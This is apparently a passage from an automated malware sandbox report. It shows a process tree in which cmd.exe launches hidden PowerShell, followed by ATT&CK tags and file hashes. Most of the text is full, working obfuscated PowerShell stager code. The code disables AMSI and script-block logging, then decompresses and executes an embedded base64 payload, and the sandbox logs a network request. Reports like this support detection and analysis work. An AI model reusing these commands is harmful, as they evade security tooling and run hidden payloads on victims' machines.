gBkAC8AVgBWAGIAagBVAEkAUgAxAEwAYgBKADcAUwBkAFkAbQByAGsAeAA4AGUAZABIAEEAMAA5AEMAWAB3AHAAdABJAHsAMQB9AEkANgBqAGQAdAA0AFMAUgBoAHUANwB4AG0ASwBpAEYAYwB3AFYAWAA0AHAASABIAGgASgBjAFkAWgBIAHIAUgBDADcAQQB2AC8AawBjAHIANgBCACcAJwArACcAJwAvAFQAYQBtAE8ARQBCAGMASQBDAHgAWQA4AFUAegBOAGkAQQBoAC8AMABOAFUAMgBoAFAAbwA0AFUAVAAwAEkAYQBRAHAAZQBRAGIAUQByAFQANQAwADUAQgBFADAAdQBtADYAeQBQAEkANABEAHUATQBBAGUAYQBsAHAAYQBRAEgANwBpAFEAegBuAE4AaQBYADUAdwB1ADUAaQBCAFUAMQBpAGwASwAwADYAbwAwADIARQBDAEMAZQBsAFgASgB3AFkAaABpAHYAeQBxAHAATABDAFgANQBsAHIAcgBoAGMAewAxAH0AWgBiAFAAcgByAGIAMwAxAEIATwBQAEoAVAB5AHcAdAB5ADgAOABnAFQATQAvAEYAQQA5AFoAaQBsAFAATgBoADYARQBGAEEAQwA0AGMAZABiAFkASQA0AGcASwBQAEsAcAAnACcAKwAnACcAUwBsAC8AaABZADIAegBzAGsASwBBADQAdgB2ADQAaQBHAGoAaQBpAEYAdABBAEYATABkAHgAQQBOAFcAQgBFAG8ATwBGAHcAUQBKAFEARQAvAGcAUgBTAFYAbQBvAE8ANQBHAGEAMABwAGoAawBBAGkASwB4AFkAZABpAGcASQBvAEQAWABsAHEAWgBMAHgAQwAnACcAKwAnACcAQQB7ADEAfQBiAEwATAB6AHAAWgAnACcAKwAnACcASgBNAEMAQgA3AFEASwBUAEEAbwB4ACcAJwArACcAJwBIAEwAawBLAGcASABSAHIAegBxAHUAUwBTAGgARQBQAGgARQB7ADEAfQBnAEsAWQB2ADAAUABEADUANABYAEgASABCAEYAVAAzAEEAZQBGAEwAbgBJAHEANQBtADIANQA0AEwANABwAGEAMABuAHUASgBsAEQAawB3AEcAUgBjAEEAQwBoAGsAOABTAFIAaABsAEwAOABvAFgAVwBvAEwAUABLADcAdQBrAEgAYQA3AHcAewAxAH0AdAArAEYANgBGAFkAWABTACsAMgBxADcAbQBEAE4AMgBwADIAewAxAH0AYwB0ADYAcAAnACcAKwAnACcAagBjAG0AUgBpAGsATgB3AHgARABrAHoAVABNAHcARgBGAFAAegBwAHoAVgArAHEAcgB2AFUAWgBPAGMAVwBiAGIAVAA3AHEAcABKAGUAeABjAHUAVgBUAE0AMQBqAGEANgAyAHQAeAB1AGEANgBuAFgASgBSADkAewAxAH0AUwBoAGsAUABRAEkAMwByAFAALwByADQAegBWAFYAKwBMAGcAbgBFAHcAMABiAHsAMQB9AG0ASQBCAHkAYgBjAEoARABlACcAJwArACcAJwBDADgAdwBBAHYAcABvAFoAZQBwAG8AeQBWAFEASgBOAE0AYgBsADUAYQBUAGcAOQBXADkAYwBzAGsATABkAGIAagBXAGwAMgBUAHYAMgBjAGEAdQBUAGUATQBSADIAMQBPAHgATABuADIAVgAnACcAKwAnACcANwBYAGEAcQBNAGQAbgBHAE8AMABXAHQAMwB4ADcAawBhADkANgBsAHQAcQAyAEwAbgAyAE8ANAAxAG0ASgB6AFMASQBvAHEANABjAHUAMgB0AFAAVgA1AGUAOQB0AHAASABOAFAAVABHADMASgA2AGwAQgBqAE0ANABFADcATgBpADIARwArAEsAUgB1ADkAWgBHAFIAbQBkAHEAdQAyAHMAegBPAE4AawBHAHQAdAB1AHIAdAB6AHEAaABCAHUAcwBtADIAewAxAH0AWABXAFQAaAAxAEcAbwAyAEgAZABNAHsAMQB9ACsAKwBUADgALwB2ACsAKwBDAHUANwBVADQAdABnAHEAZABtAGcAUABlAEIAYQBxAHUAcQBNADIASABVAFcAVwB4ADEAVgBWADkATQAzAE8AWQBYAFYAMQAxADEAaAByAEMAMgB1AGoASABaAHoAbAA2AHMAKwAvADUAKwAwAHEAMQAvAGMAdgBzAEUAcgAyAFAAVgBOAGwAUwAxAFEAeQBFADMASQB4AFYAdAAyAC8AWABHAEsAUAA1AGkAdQArAC8AdABvAGEASABzADkAawBOAGwAdAB6AFcAKwAxADcAYwBHAHMAYgBhAHIALwBEAHUAOAAvAFAAQQBoAHEAQwA5AGIAZwA3AHIAcgBtAEsAeQBMAFEAZwAzADgAMwBWAHUAdABGAGIARgBPAFkAQwA5AEMAcgBqAEoAWgAxAGwAMgBCAFgAOQB0AGcAOQBYAHMAMgBwAG0AaQBnAE4AMgBLADYAcQBEAGUARwBwAFAAMQBSADAAMAB5AEMATABZAEgAaAByAFMAYgB1AGIAYgBMADMAOQBpAEwAVwBtADEANgA0ACcAJwArACcAJwBCAEoALwBNADQATgB3AE8AeABqAEYAcgBvAGgAWABZAEgAUQBVAHEAZQBBAHsAMQB9ADMAZwB6AGcAdgBMAFIATgAwAHQAQQAwACcAJwArACcAJwBsAHEAKwAnACcAKwAnACcASABKAFcATgBpAHkAdABrAHAAawAnACcAKwAnACcANwBSAFQAaABaADIAUwBkAGcAMgAvAE4AMwBBAGUAVgBNADMATgBjAEIALwAvAFUAYgB0AHYAUgAyAGEAVgBqAGoAcABzACsANwBtAGoAMQBFACsALwB6AE8ANgBEAGsAYgBFAGcAWQBQADIAdgBPAFMAKwBoAFAAVQBhAHYAewAxAH0AdgBpAG0ARgA1ADgAMQBIAHYASAB5AHQARAB7ADEAfQBWAFIAawBvAGEASQBBAGwAKwBoAHcAUgBUAFYAbwBoAE0AbgBuAGIAeAByAEQARwBJAGkATgBHAFEAWgBIAGgAMAByAG4ARABCAE0AbwBWAFYARABNAHkAOABTAFQAYQBVADAAOQBrAFMALwB5AHIAbwBMADkATQBwAEQAQgB4AE0ATgBkAFcAaABtAEgAcgAzADAAVgA1AEUAZQBCAEMAdgBIAFIAbABZAHMAWABWAHgATQB3AFUAZQBSAHcAVgA2AHQAaAAxAG4AQQB3ADYAcQB5AE8AMQBNAFUANgBFAEQASwBUAG0AbABsAE8AewAxAH0AcgByADkAOQBMAGoAOQBWADQARwBVADEAWABSAHcAUQBRAHEAQgA4AE0AMABNAHcAeQAyAHkARgBLAFMANQBkADgATgBFADcAeABRAE8ARgBUAE0AMQA0AEYANgBEAFQATQA0AGUAUQBWAEYARABpAHIAdQBvAHsAMQB9AGcASQA1AEwAUQA0AHAAbwA5AHgATwAxAHoAcQBnAFEARgBIADEAQQBDAHUAQgBsAHgANgBKAHAANABtAFEAQQB4AFEAUABzAFcAMwBVAG8AbQBMAHoAdgAzADQASgBWAEIASwB4ADcAKwBUAEsAbgBuAHgARABPAEgAagAvAHgAdABWAGoAbQB2AC8AcwBQAHQATAA5AEYARwBxAEcAUwA3AFAAVgBwADgAdQBQAEcAbwA1AHYAKwAzACsASQAwAFEANAB5AEQAbgBRAEIAQwBnACsAUABFACcAJwArACcAJwBkAGUAaABpAEYAUABqAGsAZQBSAFQAYwBkAEEALwBXAFUAKwAnACcAKwAnACcAeABPAHYAOABlAHMATgBQAHIAKwBDADkAbAB6AFcAaAB2AHcARQBGADUANABuAC8ARQBnAHcAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBmACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsAIgA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3820
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c $znP8=((''Scr''+''ipt''+''{1}''+''lock{0}oggi{2}''+''g'')-f''L'',''B'',''n'');If($PSVersionTable.PSVersion.Major -ge 3){ $btfZ=[Ref].Assembly.GetType(((''{1}''+''{''+''6}''+''ste''+''m''+''.{''+''0}{9}n{9}''+''{4}''+''emen''+''t.''+''{8}{2}t{7''+''}''+''m{9}ti''+''{7}n''+''.{8''+''}''+''ms''+''i{3''+''}ti''+''{5''+''}s'')-f''M'',''S'',''u'',''U'',''g'',''l'',''y'',''o'',''A'',''a'')); if ($btfZ) { $btfZ.GetField(((''''+''a''+''m{''+''4}iI{0''+''}''+''i{2}{''+''1''+''}''+''ail{3}d'')-f''n'',''F'',''t'',''e'',''s''),''NonPublic,Static'').SetValue($null,$true); }; $zW=((''{1}n''+''able{4}c{5}i{0}t''+''{2}''+''lockIn''+''{3}ocat''+''ionLogg''+''ing''+'''')-f''p'',''E'',''B'',''v'',''S'',''r''); $r8D=[Ref].Assembly.GetType(((''''+''{2}{4}stem.{3}''+''anag''+''e''+''men''+''t.A{5}to''+''mation.{0}ti{''+''1}s'')-f''U'',''l'',''S'',''M'',''y'',''u'')); $qOK=$r8D.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); If ($qOK) { $kMZ=$qOK.GetValue($null); $yIzcl=[Collections.Generic.Dictionary[string,System.Object]]::new(); $t8ZX7=((''En''+''a{3}le''+''{1''+''}criptB''+''loc{''+''2}{0}ogging'')-f''L'',''S'',''k'',''b''); If($kMZ[$znP8]){ $kMZ[$znP8][$zW]=0; $kMZ[$znP8][$t8ZX7]=0; } $yIzcl.Add($zW,0); $yIzcl.Add($t8ZX7,0); $kMZ[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$znP8]=$yIzcl; } Else { [Ref].Assembly.GetType(((''Sy''+''s''+''tem.{5}''+''an''+''a{4}ement.A{3}''+''tomatio''+''n.Script{1}{0}''+''oc{''+''2}'')-f''l'',''B'',''k'',''u'',''g'',''M'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAOp2bWcCA7VWbW/aS''+''BD+Xqn/waqQMAoBQ2''+''ibRqp0tjHBLiS4Duat6LTYi71lvSb2EiC9/vebNXZIlOSud1L3i727M7Ozzzwzs8sN8ziJmeQb0o+3b6R8DFCCIkku7Z3rqlQKw8pxq3SrR''+''tJn''+''SZ6p63U7jhBh84sL{1}ZMkmPHDvHaJuZqmOFpQglO5Iv0ljUKc4NPrxX{1}scemHVPqzdknjBaK52F5HXoilU5X5Yq8Xe0g4VXPWlHC5/O1buTI7bcxrxu0G0VQuO/uU46jmU1quSD8r4sCb/RrL5T7xkjiNl7w2IuysWRuyFC3xFVi7w33Mw9hPy3CX420SzDcJyy4lrBxk5DL8Dp''+''LYU30/wWlarkozYX82n/8hz/LDv24YJxGumYzjJF47OLkjHk5rXcR8ir/i5Ry0HJ4QFswrFRC7i1dYLrENpVXpv5iRr/C2gO5XleTHSiA14EmlCvF8{1}s1+7G8oPiiWX/BTUKAC40ADwO6ngG9Z0CY5''+''Q84LxDkuFGOW7WDwVx7EKcmUP0tKVerD0YjHyR6mpZtkgyvzB7SlUnJd/VVbjUIR1LbJ7SdYmrkx8edHA09CXwptI{1}I6jdt4SRhu7xmKiFcwVX4pHHhJcYZHrRC7Av/kcr6B''+''/TamOEBcICxY8UzNiAh/0NU2hPo4UT0IaQpeQbQrT505BE0um6yPI4DuMAealpaQH7iQznNiX5wu5iBU1ilK06o02ECCelXJwYhivyqpLCX5lrrhc{1}ZbPrrb31BOPJTywty88gTM/FA9ZilPNh6EFAC4cdbYI4gKPKp''+''Sl/hY2zskKA4vv4iGjiiFtAFLdxANWBEoOFwQJQE/gRSVmoO5Ga0pjkAiKxYdigIoDXlqZLxC''+''A{1}bLLzpZ''+''JMCB7QKTAox''+''HLkKgHRrzquSShEPhE{1}gKYv0PD54XHHBFT3AeFLnIq5m254L4pa0nuJlDkwGRcAChk8SRhlL8oXWoLPK7ukHa7w{1}t+F6FYXS+2q7mDN2p2{1}ct6p''+''jcmRikNwxDkzTMwFFPzpzV+qrvUZOcWbbT7qpJexcuVTM1ja62txua6nXJR9{1}ShkPQI3rP/r4zVV+LgnEw0b{1}mIBybcJDe''+''C8wAvpoZepoyVQJNMbl5aTg9W9cskLdbjWl2Tv2cauTeMR21OxLn2V''+''7XaqMdnGO0Wt3x7ka96ltq2Ln2O41mJzSIoq4cu2tPV5e9tpHNPTG3J6lBjM4E7Ni2G+KRu9ZGRmdqu2szONkGtturtzqhBusm2{1}XWTh1Go2HdM{1}++T8/v++Cu7U4tgqdmgPeBaquqM2HUWWx1VV9M3OYXV111hrC2ujHZzl6s+/5+0q1/cvsEr2PVNlS1QyE3IxVt2/XGKP5iu+/toaHs9kNltzW+17cGsbar/Du8/PAhqC9bg7rrmKyLQg383VutFbFOYC9CrjJZ1l2BX9tg9Xs2pmigN2K6qDeGpP1R00yCLYHhrSbubbL39iLWm164''+''BJ/M4NwOxjFrohXYHQUqeA{1}3gzgvLRN0tA0''+''lq+''+''HJWNiytkpk''+''7RThZ2Sdg2/N3AeVM3NcB//UbtvR2aVjjps+7mj1E+/zO6DkbEgYP2vOS+hPUav{1}vimF581HvHytD{1}VRkoaIAl+hwRTVohMnnbxrDGIiNGQZHh0rnDBMoVVDMy8STaU09kS/yroL9MpDBxMNdWhmHr30V5EeBCvHRlYsXVxMwUeRwV6th1nAw6qyO1MU6EDKTmllO{1}rr99Lj9V4GU1XRwQQqB8M0Mwy2yFKS5d8NE7xQOFTM14F6DTM4eQVFDiruo{1}gI5LQ4po9xO1zqgQFH1ACuBlx6Jp4mQAxQPsW3UomLzv34JVBKx7+TKnnxDOHj/xtVjmv/sPtL9FGqGS7PVp8uPGo5v+3+I0Q4yDnQBCg+PE''+''dehiFPjkeRTcdA/WU+''+''xOv8esNPr+C9lzWhvwEF54n/EgwAAA{0}{0}'')-f''='',''f'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4524
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c $znP8=((''Scr''+''ipt''+''{1}''+''lock{0}oggi{2}''+''g'')-f''L'',''B'',''n'');If($PSVersionTable.PSVersion.Major -ge 3){ $btfZ=[Ref].Assembly.GetType(((''{1}''+''{''+''6}''+''ste''+''m''+''.{''+''0}{9}n{9}''+''{4}''+''emen''+''t.''+''{8}{2}t{7''+''}''+''m{9}ti''+''{7}n''+''.{8''+''}''+''ms''+''i{3''+''}ti''+''{5''+''}s'')-f''M'',''S'',''u'',''U'',''g'',''l'',''y'',''o'',''A'',''a'')); if ($btfZ) { $btfZ.GetField(((''''+''a''+''m{''+''4}iI{0''+''}''+''i{2}{''+''1''+''}''+''ail{3}d'')-f''n'',''F'',''t'',''e'',''s''),''NonPublic,Static'').SetValue($null,$true); }; $zW=((''{1}n''+''able{4}c{5}i{0}t''+''{2}''+''lockIn''+''{3}ocat''+''ionLogg''+''ing''+'''')-f''p'',''E'',''B'',''v'',''S'',''r''); $r8D=[Ref].Assembly.GetType(((''''+''{2}{4}stem.{3}''+''anag''+''e''+''men''+''t.A{5}to''+''mation.{0}ti{''+''1}s'')-f''U'',''l'',''S'',''M'',''y'',''u'')); $qOK=$r8D.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); If ($qOK) { $kMZ=$qOK.GetValue($null); $yIzcl=[Collections.Generic.Dictionary[string,System.Object]]::new(); $t8ZX7=((''En''+''a{3}le''+''{1''+''}criptB''+''loc{''+''2}{0}ogging'')-f''L'',''S'',''k'',''b''); If($kMZ[$znP8]){ $kMZ[$znP8][$zW]=0; $kMZ[$znP8][$t8ZX7]=0; } $yIzcl.Add($zW,0); $yIzcl.Add($t8ZX7,0); $kMZ[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$znP8]=$yIzcl; } Else { [Ref].Assembly.GetType(((''Sy''+''s''+''tem.{5}''+''an''+''a{4}ement.A{3}''+''tomatio''+''n.Script{1}{0}''+''oc{''+''2}'')-f''l'',''B'',''k'',''u'',''g'',''M'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAOp2bWcCA7VWbW/aS''+''BD+Xqn/waqQMAoBQ2''+''ibRqp0tjHBLiS4Duat6LTYi71lvSb2EiC9/vebNXZIlOSud1L3i727M7Ozzzwzs8sN8ziJmeQb0o+3b6R8DFCCIkku7Z3rqlQKw8pxq3SrR''+''tJn''+''SZ6p63U7jhBh84sL{1}ZMkmPHDvHaJuZqmOFpQglO5Iv0ljUKc4NPrxX{1}scemHVPqzdknjBaK52F5HXoilU5X5Yq8Xe0g4VXPWlHC5/O1buTI7bcxrxu0G0VQuO/uU46jmU1quSD8r4sCb/RrL5T7xkjiNl7w2IuysWRuyFC3xFVi7w33Mw9hPy3CX420SzDcJyy4lrBxk5DL8Dp''+''LYU30/wWlarkozYX82n/8hz/LDv24YJxGumYzjJF47OLkjHk5rXcR8ir/i5Ry0HJ4QFswrFRC7i1dYLrENpVXpv5iRr/C2gO5XleTHSiA14EmlCvF8{1}s1+7G8oPiiWX/BTUKAC40ADwO6ngG9Z0CY5''+''Q84LxDkuFGOW7WDwVx7EKcmUP0tKVerD0YjHyR6mpZtkgyvzB7SlUnJd/VVbjUIR1LbJ7SdYmrkx8edHA09CXwptI{1}I6jdt4SRhu7xmKiFcwVX4pHHhJcYZHrRC7Av/kcr6B''+''/TamOEBcICxY8UzNiAh/0NU2hPo4UT0IaQpeQbQrT505BE0um6yPI4DuMAealpaQH7iQznNiX5wu5iBU1ilK06o02ECCelXJwYhivyqpLCX5lrrhc{1}ZbPrrb31BOPJTywty88gTM/FA9ZilPNh6EFAC4cdbYI4gKPKp''+''Sl/hY2zskKA4vv4iGjiiFtAFLdxANWBEoOFwQJQE/gRSVmoO5Ga0pjkAiKxYdigIoDXlqZLxC''+''A{1}bLLzpZ''+''JMCB7QKTAox''+''HLkKgHRrzquSShEPhE{1}gKYv0PD54XHHBFT3AeFLnIq5m254L4pa0nuJlDkwGRcAChk8SRhlL8oXWoLPK7ukHa7w{1}t+F6FYXS+2q7mDN2p2{1}ct6p''+''jcmRikNwxDkzTMwFFPzpzV+qrvUZOcWbbT7qpJexcuVTM1ja62txua6nXJR9{1}ShkPQI3rP/r4zVV+LgnEw0b{1}mIBybcJDe''+''C8wAvpoZepoyVQJNMbl5aTg9W9cskLdbjWl2Tv2cauTeMR21OxLn2V''+''7XaqMdnGO0Wt3x7ka96ltq2Ln2O41mJzSIoq4cu2tPV5e9tpHNPTG3J6lBjM4E7Ni2G+KRu9ZGRmdqu2szONkGtturtzqhBusm2{1}XWTh1Go2HdM{1}++T8/v++Cu7U4tgqdmgPeBaquqM2HUWWx1VV9M3OYXV111hrC2ujHZzl6s+/5+0q1/cvsEr2PVNlS1QyE3IxVt2/XGKP5iu+/toaHs9kNltzW+17cGsbar/Du8/PAhqC9bg7rrmKyLQg383VutFbFOYC9CrjJZ1l2BX9tg9Xs2pmigN2K6qDeGpP1R00yCLYHhrSbubbL39iLWm164''+''BJ/M4NwOxjFrohXYHQUqeA{1}3gzgvLRN0tA0''+''lq+''+''HJWNiytkpk''+''7RThZ2Sdg2/N3AeVM3NcB//UbtvR2aVjjps+7mj1E+/zO6DkbEgYP2vOS+hPUav{1}vimF581HvHytD{1}VRkoaIAl+hwRTVohMnnbxrDGIiNGQZHh0rnDBMoVVDMy8STaU09kS/yroL9MpDBxMNdWhmHr30V5EeBCvHRlYsXVxMwUeRwV6th1nAw6qyO1MU6EDKTmllO{1}rr99Lj9V4GU1XRwQQqB8M0Mwy2yFKS5d8NE7xQOFTM14F6DTM4eQVFDiruo{1}gI5LQ4po9xO1zqgQFH1ACuBlx6Jp4mQAxQPsW3UomLzv34JVBKx7+TKnnxDOHj/xtVjmv/sPtL9FGqGS7PVp8uPGo5v+3+I0Q4yDnQBCg+PE''+''dehiFPjkeRTcdA/WU+''+''xOv8esNPr+C9lzWhvwEF54n/EgwAAA{0}{0}'')-f''='',''f'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3708
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -noni -nop -w hidden -c $znP8=(('Scr'+'ipt'+'{1}'+'lock{0}oggi{2}'+'g')-f'L','B','n');If($PSVersionTable.PSVersion.Major -ge 3){ $btfZ=[Ref].Assembly.GetType((('{1}'+'{'+'6}'+'ste'+'m'+'.{'+'0}{9}n{9}'+'{4}'+'emen'+'t.'+'{8}{2}t{7'+'}'+'m{9}ti'+'{7}n'+'.{8'+'}'+'ms'+'i{3'+'}ti'+'{5'+'}s')-f'M','S','u','U','g','l','y','o','A','a')); if ($btfZ) { $btfZ.GetField(((''+'a'+'m{'+'4}iI{0'+'}'+'i{2}{'+'1'+'}'+'ail{3}d')-f'n','F','t','e','s'),'NonPublic,Static').SetValue($null,$true); }; $zW=(('{1}n'+'able{4}c{5}i{0}t'+'{2}'+'lockIn'+'{3}ocat'+'ionLogg'+'ing'+'')-f'p','E','B','v','S','r'); $r8D=[Ref].Assembly.GetType(((''+'{2}{4}stem.{3}'+'anag'+'e'+'men'+'t.A{5}to'+'mation.{0}ti{'+'1}s')-f'U','l','S','M','y','u')); $qOK=$r8D.GetField('cachedGroupPolicySettings','NonPublic,Static'); If ($qOK) { $kMZ=$qOK.GetValue($null); $yIzcl=[Collections.Generic.Dictionary[string,System.Object]]::new(); $t8ZX7=(('En'+'a{3}le'+'{1'+'}criptB'+'loc{'+'2}{0}ogging')-f'L','S','k','b'); If($kMZ[$znP8]){ $kMZ[$znP8][$zW]=0; $kMZ[$znP8][$t8ZX7]=0; } $yIzcl.Add($zW,0); $yIzcl.Add($t8ZX7,0); $kMZ['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\'+$znP8]=$yIzcl; } Else { [Ref].Assembly.GetType((('Sy'+'s'+'tem.{5}'+'an'+'a{4}ement.A{3}'+'tomatio'+'n.Script{1}{0}'+'oc{'+'2}')-f'l','B','k','u','g','M')).GetField('signatures','NonPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAOp2bWcCA7VWbW/aS'+'BD+Xqn/waqQMAoBQ2'+'ibRqp0tjHBLiS4Duat6LTYi71lvSb2EiC9/vebNXZIlOSud1L3i727M7Ozzzwzs8sN8ziJmeQb0o+3b6R8DFCCIkku7Z3rqlQKw8pxq3SrR'+'tJn'+'SZ6p63U7jhBh84sL{1}ZMkmPHDvHaJuZqmOFpQglO5Iv0ljUKc4NPrxX{1}scemHVPqzdknjBaK52F5HXoilU5X5Yq8Xe0g4VXPWlHC5/O1buTI7bcxrxu0G0VQuO/uU46jmU1quSD8r4sCb/RrL5T7xkjiNl7w2IuysWRuyFC3xFVi7w33Mw9hPy3CX420SzDcJyy4lrBxk5DL8Dp'+'LYU30/wWlarkozYX82n/8hz/LDv24YJxGumYzjJF47OLkjHk5rXcR8ir/i5Ry0HJ4QFswrFRC7i1dYLrENpVXpv5iRr/C2gO5XleTHSiA14EmlCvF8{1}s1+7G8oPiiWX/BTUKAC40ADwO6ngG9Z0CY5'+'Q84LxDkuFGOW7WDwVx7EKcmUP0tKVerD0YjHyR6mpZtkgyvzB7SlUnJd/VVbjUIR1LbJ7SdYmrkx8edHA09CXwptI{1}I6jdt4SRhu7xmKiFcwVX4pHHhJcYZHrRC7Av/kcr6B'+'/TamOEBcICxY8UzNiAh/0NU2hPo4UT0IaQpeQbQrT505BE0um6yPI4DuMAealpaQH7iQznNiX5wu5iBU1ilK06o02ECCelXJwYhivyqpLCX5lrrhc{1}ZbPrrb31BOPJTywty88gTM/FA9ZilPNh6EFAC4cdbYI4gKPKp'+'Sl/hY2zskKA4vv4iGjiiFtAFLdxANWBEoOFwQJQE/gRSVmoO5Ga0pjkAiKxYdigIoDXlqZLxC'+'A{1}bLLzpZ'+'JMCB7QKTAox'+'HLkKgHRrzquSShEPhE{1}gKYv0PD54XHHBFT3AeFLnIq5m254L4pa0nuJlDkwGRcAChk8SRhlL8oXWoLPK7ukHa7w{1}t+F6FYXS+2q7mDN2p2{1}ct6p'+'jcmRikNwxDkzTMwFFPzpzV+qrvUZOcWbbT7qpJexcuVTM1ja62txua6nXJR9{1}ShkPQI3rP/r4zVV+LgnEw0b{1}mIBybcJDe'+'C8wAvpoZepoyVQJNMbl5aTg9W9cskLdbjWl2Tv2cauTeMR21OxLn2V'+'7XaqMdnGO0Wt3x7ka96ltq2Ln2O41mJzSIoq4cu2tPV5e9tpHNPTG3J6lBjM4E7Ni2G+KRu9ZGRmdqu2szONkGtturtzqhBusm2{1}XWTh1Go2HdM{1}++T8/v++Cu7U4tgqdmgPeBaquqM2HUWWx1VV9M3OYXV111hrC2ujHZzl6s+/5+0q1/cvsEr2PVNlS1QyE3IxVt2/XGKP5iu+/toaHs9kNltzW+17cGsbar/Du8/PAhqC9bg7rrmKyLQg383VutFbFOYC9CrjJZ1l2BX9tg9Xs2pmigN2K6qDeGpP1R00yCLYHhrSbubbL39iLWm164'+'BJ/M4NwOxjFrohXYHQUqeA{1}3gzgvLRN0tA0'+'lq+'+'HJWNiytkpk'+'7RThZ2Sdg2/N3AeVM3NcB//UbtvR2aVjjps+7mj1E+/zO6DkbEgYP2vOS+hPUav{1}vimF581HvHytD{1}VRkoaIAl+hwRTVohMnnbxrDGIiNGQZHh0rnDBMoVVDMy8STaU09kS/yroL9MpDBxMNdWhmHr30V5EeBCvHRlYsXVxMwUeRwV6th1nAw6qyO1MU6EDKTmllO{1}rr99Lj9V4GU1XRwQQqB8M0Mwy2yFKS5d8NE7xQOFTM14F6DTM4eQVFDiruo{1}gI5LQ4po9xO1zqgQFH1ACuBlx6Jp4mQAxQPsW3UomLzv34JVBKx7+TKnnxDOHj/xtVjmv/sPtL9FGqGS7PVp8uPGo5v+3+I0Q4yDnQBCg+PE'+'dehiFPjkeRTcdA/WU+'+'xOv8esNPr+C9lzWhvwEF54n/EgwAAA{0}{0}')-f'=','f')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
